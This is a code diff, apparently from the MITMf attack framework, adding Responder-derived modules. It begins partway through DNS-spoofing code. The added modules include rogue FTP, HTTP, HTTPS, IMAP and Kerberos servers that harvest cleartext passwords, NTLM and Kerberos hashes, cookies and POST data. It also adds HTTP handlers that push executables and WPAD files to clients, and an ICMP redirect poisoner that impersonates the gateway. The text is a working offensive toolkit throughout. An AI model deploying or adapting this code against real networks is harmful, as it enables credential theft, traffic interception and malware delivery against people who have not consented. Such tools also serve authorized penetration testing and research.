+			if self.hsts:
+				spoofed_pkt[DNS].an = DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=ip[0]); del ip[0] #have to do this first to initialize the an field
+				for i in ip:
+					spoofed_pkt[DNS].an.add_payload(DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=i))
+				mitmf_logger.info("%s Resolving %s for HSTS bypass (DNS)" % (pkt[IP].src, pkt[DNSQR].qname[:-1]))
+				payload.set_payload(str(spoofed_pkt))
+				payload.accept()
+
+			if self.dns:
+				spoofed_pkt[DNS].an = DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=ip) 
+				mitmf_logger.info("%s Modified DNS packet for %s" % (pkt[IP].src, pkt[DNSQR].qname[:-1]))
+				payload.set_payload(str(spoofed_pkt))
+				payload.accept()
+		
+		except Exception, e:
+			print "Exception occurred while modifying DNS: " + str(e)

core/protocols/ftp/FTPServer.py

@@ -0,0 +1,71 @@
+##################################################################################
+#FTP Stuff starts here
+##################################################################################
+
+class FTPServer():
+
+	def serve_thread_tcp(host, port, handler):
+		try:
+			server = ThreadingTCPServer((host, port), handler)
+			server.serve_forever()
+		except Exception, e:
+			print "Error starting TCP server on port %s: %s:" % (str(port),str(e))
+
+	#Function name self-explanatory
+	def start(FTP_On_Off):
+		if FTP_On_Off == "ON":
+			t = threading.Thread(name="FTP", target=self.serve_thread_tcp, args=("0.0.0.0", 21, FTP))
+			t.setDaemon(True)
+			t.start()
+
+		if FTP_On_Off == "OFF":
+			return False
+
+class ThreadingTCPServer(ThreadingMixIn, TCPServer):
+
+	allow_reuse_address = 1
+
+	def server_bind(self):
+		TCPServer.server_bind(self)
+
+class FTPPacket(Packet):
+	fields = OrderedDict([
+		("Code",           "220"),
+		("Separator",      "\x20"),
+		("Message",        "Welcome"),
+		("Terminator",     "\x0d\x0a"),
+	])
+
+#FTP server class.
+class FTP(BaseRequestHandler):
+
+	def handle(self):
+		try:
+			self.request.send(str(FTPPacket()))
+			data = self.request.recv(1024)
+			if data[0:4] == "USER":
+				User = data[5:].replace("\r\n","")
+				#print "[+]FTP User: ", User
+				responder_logger.info('[+]FTP User: %s'%(User))
+				t = FTPPacket(Code="331",Message="User name okay, need password.")
+				self.request.send(str(t))
+				data = self.request.recv(1024)
+			if data[0:4] == "PASS":
+				Pass = data[5:].replace("\r\n","")
+				Outfile = "./logs/responder/FTP-Clear-Text-Password-"+self.client_address[0]+".txt"
+				WriteData(Outfile,User+":"+Pass, User+":"+Pass)
+				#print "[+]FTP Password is: ", Pass
+				responder_logger.info('[+]FTP Password is: %s'%(Pass))
+				t = FTPPacket(Code="530",Message="User not logged in.")
+				self.request.send(str(t))
+				data = self.request.recv(1024)
+			else :
+				t = FTPPacket(Code="502",Message="Command not implemented.")
+				self.request.send(str(t))
+				data = self.request.recv(1024)
+		except Exception:
+			pass
+
+##################################################################################
+#FTP Stuff ends here
+##################################################################################

core/protocols/http/HTTPProxy.py

@@ -0,0 +1,240 @@
+##################################################################################
+#HTTP Proxy Stuff starts here (Not Used)
+##################################################################################
+
+class HTTPProxy():
+
+	def serve_thread_tcp(host, port, handler):
+		try:
+			server = ThreadingTCPServer((host, port), handler)
+			server.serve_forever()
+		except Exception, e:
+			print "Error starting TCP server on port %s: %s:" % (str(port),str(e))
+
+	def start(on_off):
+		if on_off == "ON":
+			t = threading.Thread(name="HTTP", target=self.serve_thread_tcp, args=("0.0.0.0", 80,HTTP))
+			t.setDaemon(True)
+			t.start()
+
+		if on_off == "OFF":
+			return False
+
+class ThreadingTCPServer(ThreadingMixIn, TCPServer):
+
+	allow_reuse_address = 1
+
+	def server_bind(self):
+		TCPServer.server_bind(self)
+
+#Parse NTLMv1/v2 hash.
+def ParseHTTPHash(data,client):
+	LMhashLen = struct.unpack('<H',data[12:14])[0]
+	LMhashOffset = struct.unpack('<H',data[16:18])[0]
+	LMHash = data[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
+	NthashLen = struct.unpack('<H',data[20:22])[0]
+	NthashOffset = struct.unpack('<H',data[24:26])[0]
+	NTHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
+	if NthashLen == 24:
+		NtHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
+		HostNameLen = struct.unpack('<H',data[46:48])[0]
+		HostNameOffset = struct.unpack('<H',data[48:50])[0]
+		Hostname = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
+		UserLen = struct.unpack('<H',data[36:38])[0]
+		UserOffset = struct.unpack('<H',data[40:42])[0]
+		User = data[UserOffset:UserOffset+UserLen].replace('\x00','')
+		outfile = "./logs/responder/HTTP-NTLMv1-Client-"+client+".txt"
+		WriteHash = User+"::"+Hostname+":"+LMHash+":"+NtHash+":"+NumChal
+		WriteData(outfile,WriteHash, User+"::"+Hostname)
+		responder_logger.info('[+]HTTP NTLMv1 hash captured from :%s'%(client))
+		responder_logger.info('[+]HTTP NTLMv1 Hostname is :%s'%(Hostname))
+		responder_logger.info('[+]HTTP NTLMv1 User is :%s'%(data[UserOffset:UserOffset+UserLen].replace('\x00','')))
+		responder_logger.info('[+]HTTP NTLMv1 Complete hash is :%s'%(WriteHash))
+
+	if NthashLen > 24:
+		NthashLen = 64
+		DomainLen = struct.unpack('<H',data[28:30])[0]
+		DomainOffset = struct.unpack('<H',data[32:34])[0]
+		Domain = data[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
+		UserLen = struct.unpack('<H',data[36:38])[0]
+		UserOffset = struct.unpack('<H',data[40:42])[0]
+		User = data[UserOffset:UserOffset+UserLen].replace('\x00','')
+		HostNameLen = struct.unpack('<H',data[44:46])[0]
+		HostNameOffset = struct.unpack('<H',data[48:50])[0]
+		HostName =  data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
+		outfile = "./logs/responder/HTTP-NTLMv2-Client-"+client+".txt"
+		WriteHash = User+"::"+Domain+":"+NumChal+":"+NTHash[:32]+":"+NTHash[32:]
+		WriteData(outfile,WriteHash, User+"::"+Domain)
+		responder_logger.info('[+]HTTP NTLMv2 hash captured from :%s'%(client))
+		responder_logger.info('[+]HTTP NTLMv2 User is : %s'%(User))
+		responder_logger.info('[+]HTTP NTLMv2 Domain is :%s'%(Domain))
+		responder_logger.info('[+]HTTP NTLMv2 Hostname is :%s'%(HostName))
+		responder_logger.info('[+]HTTP NTLMv2 Complete hash is :%s'%(WriteHash))
+
+def GrabCookie(data,host):
+	Cookie = re.search('(Cookie:*.\=*)[^\r\n]*', data)
+	if Cookie:
+		CookieStr = "[+]HTTP Cookie Header sent from: %s The Cookie is: \n%s"%(host,Cookie.group(0))
+		responder_logger.info(CookieStr)
+		return Cookie.group(0)
+	else:
+		NoCookies = "No cookies were sent with this request"
+		responder_logger.info(NoCookies)
+		return NoCookies
+
+def WpadCustom(data,client):
+	Wpad = re.search('(/wpad.dat|/*\.pac)', data)
+	if Wpad:
+		buffer1 = WPADScript(Payload=WPAD_Script)
+		buffer1.calculate()
+		return str(buffer1)
+	else:
+		return False
+
+def WpadForcedAuth(Force_WPAD_Auth):
+	if Force_WPAD_Auth == True:
+		return True
+	if Force_WPAD_Auth == False:
+		return False
+
+# Function used to check if we answer with a Basic or NTLM auth.
+def Basic_Ntlm(Basic):
+	if Basic == True:
+		return IIS_Basic_401_Ans()
+	else:
+		return IIS_Auth_401_Ans()
+
+def ServeEXE(data,client, Filename):
+	Message = "[+]Sent %s file sent to: %s."%(Filename,client)
+	responder_logger.info(Message)
+	with open (Filename, "rb") as bk:
+		data = bk.read()
+		bk.close()
+		return data
+
+def ServeEXEOrNot(on_off):
+	if Exe_On_Off == "ON":
+		return True
+	if Exe_On_Off == "OFF":
+		return False
+
+def ServeEXECAlwaysOrNot(on_off):
+	if Exec_Mode_On_Off == "ON":
+		return True
+	if Exec_Mode_On_Off == "OFF":
+		return False
+
+def IsExecutable(Filename):
+	exe = re.findall('.exe',Filename)
+	if exe:
+		return True
+	else:
+		return False
+
+def GrabURL(data, host):
+	GET = re.findall('(?<=GET )[^HTTP]*', data)
+	POST = re.findall('(?<=POST )[^HTTP]*', data)
+	POSTDATA = re.findall('(?<=\r\n\r\n)[^*]*', data)
+	if GET:
+		HostStr = "[+]HTTP GET request from : %s. The HTTP URL requested was: %s"%(host, ''.join(GET))
+		responder_logger.info(HostStr)
+		#print HostStr
+
+	if POST:
+		Host3Str = "[+]HTTP POST request from : %s. The HTTP URL requested was: %s"%(host,''.join(POST))
+		responder_logger.info(Host3Str)
+		#print Host3Str
+		if len(''.join(POSTDATA)) >2:
+			PostData = '[+]The HTTP POST DATA in this request was: %s'%(''.join(POSTDATA).strip())
+			#print PostData
+			responder_logger.info(PostData)
+
+#Handle HTTP packet sequence.
+def PacketSequence(data,client):
+	Ntlm = re.findall('(?<=Authorization: NTLM )[^\\r]*', data)
+	BasicAuth = re.findall('(?<=Authorization: Basic )[^\\r]*', data)
+
+	if ServeEXEOrNot(Exe_On_Off) and re.findall('.exe', data):
+		File = config.get('HTTP Server', 'ExecFilename')
+		buffer1 = ServerExeFile(Payload = ServeEXE(data,client,File),filename=File)
+		buffer1.calculate()
+		return str(buffer1)
+
+	if ServeEXECAlwaysOrNot(Exec_Mode_On_Off):
+		if IsExecutable(FILENAME):
+			buffer1 = ServeAlwaysExeFile(Payload = ServeEXE(data,client,FILENAME),ContentDiFile=FILENAME)
+			buffer1.calculate()
+			return str(buffer1)
+		else:
+			buffer1 = ServeAlwaysNormalFile(Payload = ServeEXE(data,client,FILENAME))
+			buffer1.calculate()
+			return str(buffer1)
+
+	if Ntlm:
+		packetNtlm = b64decode(''.join(Ntlm))[8:9]
+		if packetNtlm == "\x01":
+			GrabURL(data,client)
+			GrabCookie(data,client)
+			r = NTLM_Challenge(ServerChallenge=Challenge)
+			r.calculate()
+			t = IIS_NTLM_Challenge_Ans()
+			t.calculate(str(r))
+			buffer1 = str(t)
+			return buffer1
+		if packetNtlm == "\x03":
+			NTLM_Auth= b64decode(''.join(Ntlm))
+			ParseHTTPHash(NTLM_Auth,client)
+			if WpadForcedAuth(Force_WPAD_Auth) and WpadCustom(data,client):
+				Message = "[+]WPAD (auth) file sent to: %s"%(client)
+				if Verbose:
+					print Message
+				responder_logger.info(Message)
+				buffer1 = WpadCustom(data,client)
+				return buffer1
+			else:
+				buffer1 = IIS_Auth_Granted(Payload=HTMLToServe)
+				buffer1.calculate()
+				return str(buffer1)
+
+	if BasicAuth:
+		GrabCookie(data,client)
+		GrabURL(data,client)
+		outfile = "./logs/responder/HTTP-Clear-Text-Password-"+client+".txt"
+		WriteData(outfile,b64decode(''.join(BasicAuth)), b64decode(''.join(BasicAuth)))
+		responder_logger.info('[+]HTTP-User & Password: %s'%(b64decode(''.join(BasicAuth))))
+		if WpadForcedAuth(Force_WPAD_Auth) and WpadCustom(data,client):
+			Message = "[+]WPAD (auth) file sent to: %s"%(client)
+			if Verbose:
+				print Message
+			responder_logger.info(Message)
+			buffer1 = WpadCustom(data,client)
+			return buffer1
+		else:
+			buffer1 = IIS_Auth_Granted(Payload=HTMLToServe)
+			buffer1.calculate()
+			return str(buffer1)
+
+	else:
+		return str(Basic_Ntlm(Basic))
+
+#HTTP Server Class
+class HTTP(BaseRequestHandler):
+
+	def handle(self):
+		try:
+			while True:
+				self.request.settimeout(1)
+				data = self.request.recv(8092)
+				buff = WpadCustom(data,self.client_address[0])
+				if buff and WpadForcedAuth(Force_WPAD_Auth) == False:
+					Message = "[+]WPAD (no auth) file sent to: %s"%(self.client_address[0])
+					if Verbose:
+						print Message
+					responder_logger.info(Message)
+					self.request.send(buff)
+				else:
+					buffer0 = PacketSequence(data,self.client_address[0])
+					self.request.send(buffer0)
+		except Exception:
+			pass#No need to be verbose..
+			

core/protocols/http/HTTPSProxy.py

@@ -0,0 +1,145 @@
+##################################################################################
+#HTTPS Server stuff starts here (Not Used)
+##################################################################################
+
+class HTTPSProxy():
+
+	def serve_thread_SSL(host, port, handler):
+		try:
+			server = SSlSock((host, port), handler)
+			server.serve_forever()
+		except Exception, e:
+			print "Error starting TCP server on port %s: %s:" % (str(port),str(e))
+
+	#Function name self-explanatory
+	def start(SSL_On_Off):
+		if SSL_On_Off == "ON":
+			t = threading.Thread(name="SSL", target=self.serve_thread_SSL, args=("0.0.0.0", 443,DoSSL))        
+			t.setDaemon(True)
+			t.start()
+			return t
+		if SSL_On_Off == "OFF":
+			return False
+
+class SSlSock(ThreadingMixIn, TCPServer):
+	def __init__(self, server_address, RequestHandlerClass):
+		BaseServer.__init__(self, server_address, RequestHandlerClass)
+		ctx = SSL.Context(SSL.SSLv3_METHOD)
+		ctx.use_privatekey_file(SSLkey)
+		ctx.use_certificate_file(SSLcert)
+		self.socket = SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type))
+		self.server_bind()
+		self.server_activate()
+
+	def shutdown_request(self,request):
+		try:
+			request.shutdown()
+		except:
+			pass
+
+class DoSSL(StreamRequestHandler):
+	def setup(self):
+		self.exchange = self.request
+		self.rfile = socket._fileobject(self.request, "rb", self.rbufsize)
+		self.wfile = socket._fileobject(self.request, "wb", self.wbufsize)
+
+	def handle(self):
+		try:
+			while True:
+				data = self.exchange.recv(8092)
+				self.exchange.settimeout(0.5)
+				buff = WpadCustom(data,self.client_address[0])
+				if buff:
+					self.exchange.send(buff)
+				else:
+					buffer0 = HTTPSPacketSequence(data,self.client_address[0])
+					self.exchange.send(buffer0)
+		except:
+			pass
+
+#Parse NTLMv1/v2 hash.
+def ParseHTTPSHash(data,client):
+	LMhashLen = struct.unpack('<H',data[12:14])[0]
+	LMhashOffset = struct.unpack('<H',data[16:18])[0]
+	LMHash = data[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
+	NthashLen = struct.unpack('<H',data[20:22])[0]
+	NthashOffset = struct.unpack('<H',data[24:26])[0]
+	NTHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
+	if NthashLen == 24:
+		#print "[+]HTTPS NTLMv1 hash captured from :",client
+		responder_logger.info('[+]HTTPS NTLMv1 hash captured from :%s'%(client))
+		NtHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
+		HostNameLen = struct.unpack('<H',data[46:48])[0]
+		HostNameOffset = struct.unpack('<H',data[48:50])[0]
+		Hostname = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
+		#print "Hostname is :", Hostname
+		responder_logger.info('[+]HTTPS NTLMv1 Hostname is :%s'%(Hostname))
+		UserLen = struct.unpack('<H',data[36:38])[0]
+		UserOffset = struct.unpack('<H',data[40:42])[0]
+		User = data[UserOffset:UserOffset+UserLen].replace('\x00','')
+		#print "User is :", data[UserOffset:UserOffset+UserLen].replace('\x00','')
+		responder_logger.info('[+]HTTPS NTLMv1 User is :%s'%(data[UserOffset:UserOffset+UserLen].replace('\x00','')))
+		outfile = "./logs/responder/HTTPS-NTLMv1-Client-"+client+".txt"
+		WriteHash = User+"::"+Hostname+":"+LMHash+":"+NtHash+":"+NumChal
+		WriteData(outfile,WriteHash, User+"::"+Hostname)
+		#print "Complete hash is : ", WriteHash
+		responder_logger.info('[+]HTTPS NTLMv1 Complete hash is :%s'%(WriteHash))
+	if NthashLen > 24:
+		#print "[+]HTTPS NTLMv2 hash captured from :",client
+		responder_logger.info('[+]HTTPS NTLMv2 hash captured from :%s'%(client))
+		NthashLen = 64
+		DomainLen = struct.unpack('<H',data[28:30])[0]
+		DomainOffset = struct.unpack('<H',data[32:34])[0]
+		Domain = data[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
+		#print "Domain is : ", Domain
+		responder_logger.info('[+]HTTPS NTLMv2 Domain is :%s'%(Domain))
+		UserLen = struct.unpack('<H',data[36:38])[0]
+		UserOffset = struct.unpack('<H',data[40:42])[0]
+		User = data[UserOffset:UserOffset+UserLen].replace('\x00','')
+		#print "User is :", User
+		responder_logger.info('[+]HTTPS NTLMv2 User is : %s'%(User))
+		HostNameLen = struct.unpack('<H',data[44:46])[0]
+		HostNameOffset = struct.unpack('<H',data[48:50])[0]
+		HostName =  data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
+		#print "Hostname is :", HostName
+		responder_logger.info('[+]HTTPS NTLMv2 Hostname is :%s'%(HostName))
+		outfile = "./logs/responder/HTTPS-NTLMv2-Client-"+client+".txt"
+		WriteHash = User+"::"+Domain+":"+NumChal+":"+NTHash[:32]+":"+NTHash[32:]
+		WriteData(outfile,WriteHash, User+"::"+Domain)
+		#print "Complete hash is : ", WriteHash
+		responder_logger.info('[+]HTTPS NTLMv2 Complete hash is :%s'%(WriteHash))
+
+#Handle HTTPS packet sequence.
+def HTTPSPacketSequence(data,client):
+	a = re.findall('(?<=Authorization: NTLM )[^\\r]*', data)
+	b = re.findall('(?<=Authorization: Basic )[^\\r]*', data)
+	if a:
+		packetNtlm = b64decode(''.join(a))[8:9]
+		if packetNtlm == "\x01":
+			GrabCookie(data,client)
+			r = NTLM_Challenge(ServerChallenge=Challenge)
+			r.calculate()
+			t = IIS_NTLM_Challenge_Ans()
+			t.calculate(str(r))
+			buffer1 = str(t)
+			return buffer1
+		if packetNtlm == "\x03":
+			NTLM_Auth= b64decode(''.join(a))
+			ParseHTTPSHash(NTLM_Auth,client)
+			buffer1 = str(IIS_Auth_Granted(Payload=HTMLToServe))
+			return buffer1
+	if b:
+		GrabCookie(data,client)
+		outfile = "./logs/responder/HTTPS-Clear-Text-Password-"+client+".txt"
+		WriteData(outfile,b64decode(''.join(b)), b64decode(''.join(b)))
+		#print "[+]HTTPS-User & Password:", b64decode(''.join(b))
+		responder_logger.info('[+]HTTPS-User & Password: %s'%(b64decode(''.join(b))))
+		buffer1 = str(IIS_Auth_Granted(Payload=HTMLToServe))
+		return buffer1
+
+	else:
+		return str(Basic_Ntlm(Basic))
+
+##################################################################################
+#HTTPS Server stuff ends here (Not Used)
+##################################################################################

core/protocols/icmp/ICMPpoisoner.py

@@ -0,0 +1,68 @@
+#!/usr/bin/env python2.7
+
+# Copyright (c) 2014-2016 Marcello Salvati
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation; either version 3 of the
+# License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful, but
+# WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+# General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
+# USA
+#
+
+import logging
+import threading
+import binascii
+import random
+#import dns.resolver
+
+from base64 import b64decode
+from urllib import unquote
+from time import sleep
+#from netfilterqueue import NetfilterQueue
+
+logging.getLogger("scapy.runtime").setLevel(logging.ERROR)  #Gets rid of IPV6 Error when importing scapy
+from scapy.all import *
+
+mitmf_logger = logging.getLogger('mitmf')
+
+class ICMPpoisoner():
+
+    def __init__(self, interface, target, gateway, ip_address):
+
+        self.target        = target
+        self.gateway       = gateway
+        self.interface     = interface
+        self.ip_address    = ip_address
+        self.debug         = False
+        self.send          = True
+        self.icmp_interval = 2
+
+    def build_icmp(self):
+        pkt = IP(src=self.gateway, dst=self.target)/ICMP(type=5, code=1, gw=self.ip_address) /\
+              IP(src=self.target, dst=self.gateway)/UDP()
+
+        return pkt
+
+    def start(self):
+        pkt = self.build_icmp()
+
+        t = threading.Thread(name='icmp_spoof', target=self.send_icmps, args=(pkt, self.interface, self.debug,))
+        t.setDaemon(True)
+        t.start()
+
+    def stop(self):
+        self.send = False
+        sleep(3)
+
+    def send_icmps(self, pkt, interface, debug):
+        while self.send:
+            sendp(pkt, inter=self.icmp_interval, iface=interface, verbose=debug)

core/protocols/imap/IMAPPackets.py

@@ -0,0 +1,55 @@
+#! /usr/bin/env python
+# NBT-NS/LLMNR Responder
+# Created by Laurent Gaffie
+# Copyright (C) 2014 Trustwave Holdings, Inc.
+#
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+# 
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import struct
+from odict import OrderedDict
+
+class Packet():
+    fields = OrderedDict([
+        ("data", ""),
+    ])
+    def __init__(self, **kw):
+        self.fields = OrderedDict(self.__class__.fields)
+        for k,v in kw.items():
+            if callable(v):
+                self.fields[k] = v(self.fields[k])
+            else:
+                self.fields[k] = v
+    def __str__(self):
+        return "".join(map(str, self.fields.values()))
+
+#IMAP4 Greating class
+class IMAPGreating(Packet):
+    fields = OrderedDict([
+        ("Code",             "* OK IMAP4 service is ready."),
+        ("CRLF",        "\r\n"), 
+        ]) 
+
+#IMAP4 Capability class
+class IMAPCapability(Packet):
+    fields = OrderedDict([
+        ("Code",             "* CAPABILITY IMAP4 IMAP4rev1 AUTH=PLAIN"),
+        ("CRLF",        "\r\n"), 
+        ]) 
+
+#IMAP4 Capability class
+class IMAPCapabilityEnd(Packet):
+    fields = OrderedDict([
+        ("Tag",             ""),
+        ("Message",         " OK CAPABILITY completed."),
+        ("CRLF",        "\r\n"), 
+        ]) 

core/protocols/imap/IMAPServer.py

@@ -0,0 +1,58 @@
+##################################################################################
+#IMAP4 Stuff starts here
+##################################################################################
+
+
+class IMAPServer():
+
+	def serve_thread_tcp(host, port, handler):
+		try:
+			server = ThreadingTCPServer((host, port), handler)
+			server.serve_forever()
+		except Exception, e:
+			print "Error starting TCP server on port %s: %s:" % (str(port),str(e))
+
+	#Function name self-explanatory
+	def start(IMAP_On_Off):
+		if IMAP_On_Off == "ON":
+			t = threading.Thread(name="IMAP", target=self.serve_thread_tcp, args=("0.0.0.0", 143,IMAP))
+			t.setDaemon(True)
+			t.start()
+
+		if IMAP_On_Off == "OFF":
+			return False
+
+class ThreadingTCPServer(ThreadingMixIn, TCPServer):
+
+	allow_reuse_address = 1
+
+	def server_bind(self):
+		TCPServer.server_bind(self)
+
+#ESMTP server class.
+class IMAP(BaseRequestHandler):
+
+	def handle(self):
+		try:
+			self.request.send(str(IMAPGreating()))
+			data = self.request.recv(1024)
+			if data[5:15] == "CAPABILITY":
+				RequestTag = data[0:4]
+				self.request.send(str(IMAPCapability()))
+				self.request.send(str(IMAPCapabilityEnd(Tag=RequestTag)))
+				data = self.request.recv(1024)
+			if data[5:10] == "LOGIN":
+				Credentials = data[10:].strip()
+				Outfile = "./logs/responder/IMAP-Clear-Text-Password-"+self.client_address[0]+".txt"
+				WriteData(Outfile,Credentials, Credentials)
+				#print '[+]IMAP Credentials from %s. ("User" "Pass"): %s'%(self.client_address[0],Credentials)
+				responder_logger.info('[+]IMAP Credentials from %s. ("User" "Pass"): %s'%(self.client_address[0],Credentials))
+				self.request.send(str(ditchthisconnection()))
+				data = self.request.recv(1024)
+
+		except Exception:
+			pass
+
+##################################################################################
+#IMAP4 Stuff ends here
+##################################################################################

core/protocols/kerberos/KERBServer.py

@@ -0,0 +1,163 @@
+##################################################################################
+#Kerberos Server stuff starts here
+##################################################################################
+
+class KERBServer():
+
+	def serve_thread_udp(host, port, handler):
+		try:
+			server = ThreadingUDPServer((host, port), handler)
+			server.serve_forever()
+		except Exception, e:
+			print "Error starting UDP server on port %s: %s:" % (str(port),str(e))
+
+	def serve_thread_tcp(host, port, handler):
+		try:
+			server = ThreadingTCPServer((host, port), handler)
+			server.serve_forever()
+		except Exception, e:
+			print "Error starting TCP server on port %s: %s:" % (str(port),str(e))
+
+	#Function name self-explanatory
+	def start(Krb_On_Off):
+		if Krb_On_Off == "ON":
+			t1 = threading.Thread(name="KerbUDP", target=serve_thread_udp, args=("0.0.0.0", 88,KerbUDP))
+			t2 = threading.Thread(name="KerbTCP", target=serve_thread_tcp, args=("0.0.0.0", 88, KerbTCP))
+			for t in [t1,t2]:
+				t.setDaemon(True)
+				t.start()
+
+			return t1, t2
+		if Krb_On_Off == "OFF":
+			return False
+
+class ThreadingUDPServer(ThreadingMixIn, UDPServer):
+
+	allow_reuse_address = 1
+
+	def server_bind(self):
+		UDPServer.server_bind(self)
+
+class ThreadingTCPServer(ThreadingMixIn, TCPServer):
+
+	allow_reuse_address = 1
+
+	def server_bind(self):
+		TCPServer.server_bind(self)
+
+def ParseMSKerbv5TCP(Data):
+	MsgType = Data[21:22]
+	EncType = Data[43:44]
+	MessageType = Data[32:33]
+	if MsgType == "\x0a" and EncType == "\x17" and MessageType =="\x02":
+		if Data[49:53] == "\xa2\x36\x04\x34" or Data[49:53] == "\xa2\x35\x04\x33":
+			HashLen = struct.unpack('<b',Data[50:51])[0]
+			if HashLen == 54:
+				Hash = Data[53:105]
+				SwitchHash = Hash[16:]+Hash[0:16]
+				NameLen = struct.unpack('<b',Data[153:154])[0]
+				Name = Data[154:154+NameLen]
+				DomainLen = struct.unpack('<b',Data[154+NameLen+3:154+NameLen+4])[0]
+				Domain = Data[154+NameLen+4:154+NameLen+4+DomainLen]
+				BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
+				return BuildHash
+		if Data[44:48] == "\xa2\x36\x04\x34" or Data[44:48] == "\xa2\x35\x04\x33":
+			HashLen = struct.unpack('<b',Data[45:46])[0]
+			if HashLen == 53:
+				Hash = Data[48:99]
+				SwitchHash = Hash[16:]+Hash[0:16]
+				NameLen = struct.unpack('<b',Data[147:148])[0]
+				Name = Data[148:148+NameLen]
+				DomainLen = struct.unpack('<b',Data[148+NameLen+3:148+NameLen+4])[0]
+				Domain = Data[148+NameLen+4:148+NameLen+4+DomainLen]
+				BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
+				return BuildHash
+			if HashLen == 54:
+				Hash = Data[53:105]
+				SwitchHash = Hash[16:]+Hash[0:16]
+				NameLen = struct.unpack('<b',Data[148:149])[0]
+				Name = Data[149:149+NameLen]
+				DomainLen = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
+				Domain = Data[149+NameLen+4:149+NameLen+4+DomainLen]
+				BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
+				return BuildHash
+
+		else:
+			Hash = Data[48:100]
+			SwitchHash = Hash[16:]+Hash[0:16]
+			NameLen = struct.unpack('<b',Data[148:149])[0]
+			Name = Data[149:149+NameLen]
+			DomainLen = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
+			Domain = Data[149+NameLen+4:149+NameLen+4+DomainLen]
+			BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
+			return BuildHash
+	else:
+		return False
+
+def ParseMSKerbv5UDP(Data):
+	MsgType = Data[17:18]
+	EncType = Data[39:40]
+	if MsgType == "\x0a" and EncType == "\x17":
+		if Data[40:44] == "\xa2\x36\x04\x34" or Data[40:44] == "\xa2\x35\x04\x33":
+			HashLen = struct.unpack('<b',Data[41:42])[0]
+			if HashLen == 54:
+				Hash = Data[44:96]
+				SwitchHash = Hash[16:]+Hash[0:16]
+				NameLen = struct.unpack('<b',Data[144:145])[0]
+				Name = Data[145:145+NameLen]
+				DomainLen = struct.unpack('<b',Data[145+NameLen+3:145+NameLen+4])[0]
+				Domain = Data[145+NameLen+4:145+NameLen+4+DomainLen]
+				BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
+				return BuildHash
+			if HashLen == 53:
+				Hash = Data[44:95]
+				SwitchHash = Hash[16:]+Hash[0:16]
+				NameLen = struct.unpack('<b',Data[143:144])[0]
+				Name = Data[144:144+NameLen]
+				DomainLen = struct.unpack('<b',Data[144+NameLen+3:144+NameLen+4])[0]
+				Domain = Data[144+NameLen+4:144+NameLen+4+DomainLen]
+				BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
+				return BuildHash
+
+
+		else:
+			Hash = Data[49:101]
+			SwitchHash = Hash[16:]+Hash[0:16]
+			NameLen = struct.unpack('<b',Data[149:150])[0]
+			Name = Data[150:150+NameLen]
+			DomainLen = struct.unpack('<b',Data[150+NameLen+3:150+NameLen+4])[0]
+			Domain = Data[150+NameLen+4:150+NameLen+4+DomainLen]
+			BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
+			return BuildHash
+	else:
+		return False
+
+class KerbTCP(BaseRequestHandler):
+
+	def handle(self):
+		try:
+			data = self.request.recv(1024)
+			KerbHash = ParseMSKerbv5TCP(data)
+			if KerbHash:
+				Outfile = "./logs/responder/MSKerberos-Client-"+self.client_address[0]+".txt"
+				WriteData(Outfile,KerbHash, KerbHash)
+				responder_logger.info('[+]MSKerbv5 complete hash is :%s'%(KerbHash))
+		except Exception:
+			raise
+
+class KerbUDP(BaseRequestHandler):
+
+	def handle(self):
+		try:
+			data, soc = self.request
+			KerbHash = ParseMSKerbv5UDP(data)
+			if KerbHash:
+				Outfile = "./logs/responder/MSKerberos-Client-"+self.client_address[0]+".txt"
+				WriteData(Outfile,KerbHash, KerbHash)
+				responder_logger.info('[+]MSKerbv5 complete hash is :%s'%(KerbHash))
+		except Exception:
+			raise
+
+##################################################################################
+#Kerberos Server stuff ends here
+##################################################################################

core/protocols/ldap/LDAPPackets.py

@@ -0,0 +1,238 @@
+#! /usr/bin/env python
+# NBT-NS/LLMNR Responder
+# Created by Laurent Gaffie
